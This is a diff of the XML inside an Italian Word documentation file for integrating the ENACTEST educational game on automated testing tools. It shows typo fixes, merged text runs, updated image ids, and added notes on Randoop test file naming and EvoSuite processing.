--- a/Documentazione.docx
+++ b/Documentazione.docx
@@ -3914,9 +3914,14 @@
       <w:r>
         <w:t xml:space="preserve">La seguente documentazione è relativa all’attività di integrazione dei diversi task che costituiscono il gioco educativo “Man vs </w:t>
       </w:r>
-      <w:r>
-        <w:t>Autolatre</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Auto</w:t>
+      </w:r>
+      <w:r>
+        <w:t>mated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> Testing Tools challenges” del progetto ENACTEST.</w:t>
       </w:r>
@@ -4297,7 +4302,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="123D223C" wp14:editId="7284F5FD">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="123D223C" wp14:editId="531392C4">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>297815</wp:posOffset>
@@ -4627,7 +4632,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177C2D37" wp14:editId="77CF9B47">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177C2D37" wp14:editId="7DB99199">
             <wp:extent cx="5387447" cy="5052060"/>
             <wp:effectExtent l="0" t="0" r="3810" b="0"/>
             <wp:docPr id="285992442" name="Immagine 1" descr="Immagine che contiene testo, diagramma, schermata, cerchio&#10;&#10;Descrizione generata automaticamente"/>
@@ -7203,15 +7208,7 @@
         <w:t>È</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> stato utilizzato il framework </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Flask</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> per la realizzazione di questo servizio</w:t>
+        <w:t xml:space="preserve"> stato utilizzato il framework Flask per la realizzazione di questo servizio</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -7338,15 +7335,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">, esso è responsabile per eseguire l'app </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Flask</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> e gestire le richieste HTTP in arrivo.</w:t>
+        <w:t>, esso è responsabile per eseguire l'app Flask e gestire le richieste HTTP in arrivo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7752,7 +7741,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B5B56D" wp14:editId="061BE93E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B5B56D" wp14:editId="0BA6167E">
             <wp:extent cx="5809992" cy="8091672"/>
             <wp:effectExtent l="0" t="0" r="635" b="5080"/>
             <wp:docPr id="160240523" name="Immagine 1"/>
@@ -7822,7 +7811,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178706CA" wp14:editId="63567037">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178706CA" wp14:editId="1F293A16">
             <wp:extent cx="4494482" cy="3604260"/>
             <wp:effectExtent l="0" t="0" r="1905" b="0"/>
             <wp:docPr id="1860733122" name="Immagine 5" descr="Immagine che contiene testo, diagramma, Parallelo, schermata&#10;&#10;Descrizione generata automaticamente"/>
@@ -7913,7 +7902,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02294F3F" wp14:editId="3B8B1FF9">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02294F3F" wp14:editId="4B9145A2">
             <wp:extent cx="4970880" cy="2971800"/>
             <wp:effectExtent l="0" t="0" r="1270" b="0"/>
             <wp:docPr id="1828627818" name="Immagine 6" descr="Immagine che contiene testo, schermata, diagramma, linea&#10;&#10;Descrizione generata automaticamente"/>
@@ -8200,7 +8189,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="247F5BE6" wp14:editId="1985C2B4">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="247F5BE6" wp14:editId="29696696">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-476250</wp:posOffset>
@@ -8338,7 +8327,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Nel diagramma sono stati indicati in blu i componenti che sono rimasti invariati nel processo di integrazione, in verde i componenti che erano già presenti prima dell’integrazione ma sono stati modificati, mentre in viola i componenti che sono stati aggiunti, infine in gridio è stato rappresentato il repository condiviso.</w:t>
+        <w:t>Nel diagramma sono stati indicati in blu i componenti che sono rimasti invariati nel processo di integrazione, in verde i componenti che erano già presenti prima dell’integrazione ma sono stati modificati, mentre in viola i componenti che sono stati aggiunti, infine in gri</w:t>
+      </w:r>
+      <w:r>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:t>io è stato rappresentato il repository condiviso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8914,7 +8909,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3ECEEFCD" wp14:editId="778DE48C">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3ECEEFCD" wp14:editId="220EB603">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-521970</wp:posOffset>
@@ -8974,7 +8969,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61FE3E17" wp14:editId="2887A9E8">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61FE3E17" wp14:editId="17E0B1B9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="page">
               <wp:posOffset>182880</wp:posOffset>
@@ -9034,7 +9029,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C7B0C82" wp14:editId="75C88448">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C7B0C82" wp14:editId="45B04F58">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-532765</wp:posOffset>
@@ -9250,7 +9245,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C9F606E" wp14:editId="15123002">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C9F606E" wp14:editId="28DD1D0D">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-548005</wp:posOffset>
@@ -9310,7 +9305,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12DC8249" wp14:editId="042B8822">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12DC8249" wp14:editId="290E68F4">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-554355</wp:posOffset>
@@ -9370,7 +9365,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="614175CC" wp14:editId="3B5D44F7">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="614175CC" wp14:editId="1F876A86">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-544830</wp:posOffset>
@@ -9552,7 +9547,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="699A3135" wp14:editId="0AC825C2">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="699A3135" wp14:editId="185211F4">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:posOffset>-553085</wp:posOffset>
@@ -9612,7 +9607,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="117EDC8D" wp14:editId="5DF13D43">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="117EDC8D" wp14:editId="6BBBA266">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
               <wp:align>center</wp:align>
@@ -12004,14 +11999,7 @@
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Di</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> seguito è mostrato l’output del report (contenuto anche nel file evosuite_report.txt)</w:t>
+        <w:t>Di seguito è mostrato l’output del report (contenuto anche nel file evosuite_report.txt)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13821,7 +13809,405 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sarà possibile confrontare direttamente le classi di test generate dai due robot e vedere generalmente quale si comporta meglio</w:t>
+        <w:t xml:space="preserve"> sarà possibile confrontare direttamente le classi di test generate dai due robot e vedere generalmente quale si comporta meglio.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Prima di passare al report vero e proprio è necessario fare alcune osservazioni circa la struttura dei file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Randoop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e cartelle dei test </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Randoop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contengono file del tipo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest0_it0_livello1_it1_livello2.java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest0_it1_livello2.java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest1_it1_livello2.java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest_it0_livello1_it1_livello2.java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest_it1_livello2.jav</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Alcuni di questi sono TEST SUITE, che raccolgono gli altri.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>È possibile distinguere le test suite dal fatto che non hanno una cifra dopo la parola "Test"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>, i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n questo caso, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest_it0_livello1_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sono test suite.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>Ad ogni test suite corrisponde una serie di test, che è possibile riconoscere aggiungendo cifre dopo "Test" nel nome della test suite</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>, ad esempio “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest_it0_livello1_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> usa come test </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest0_it0_livello1_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e nient'altro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>, mentre “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> usa come test </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest0_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>RegressionTest1_it1_livello2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13840,7 +14226,21 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">Prima di passare al report vero e proprio è necessario fare alcune osservazioni circa la struttura dei file </w:t>
+        <w:t xml:space="preserve">Per far </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>si</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> che questi test </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -13854,522 +14254,56 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>L</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">e cartelle dei test </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>Randoop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> contengono file del tipo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t xml:space="preserve"> fossero effettivamente utilizzabili dal misuratore </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>EvoSuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, è stato quindi necessario effettuare delle elaborazioni. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>In particolare</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> è stato realizzato uno script </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>python</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest0_it0_livello1_it1_livello2.java</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest0_it1_livello2.java</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest1_it1_livello2.java</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest_it0_livello1_it1_livello2.java</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest_it1_livello2.jav</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>Alcuni di questi sono TEST SUITE, che raccolgono gli altri.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>È possibile distinguere le test suite dal fatto che non hanno una cifra dopo la parola "Test"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>, i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">n questo caso, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>RegressionTest_it0_livello1_it1_livello2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
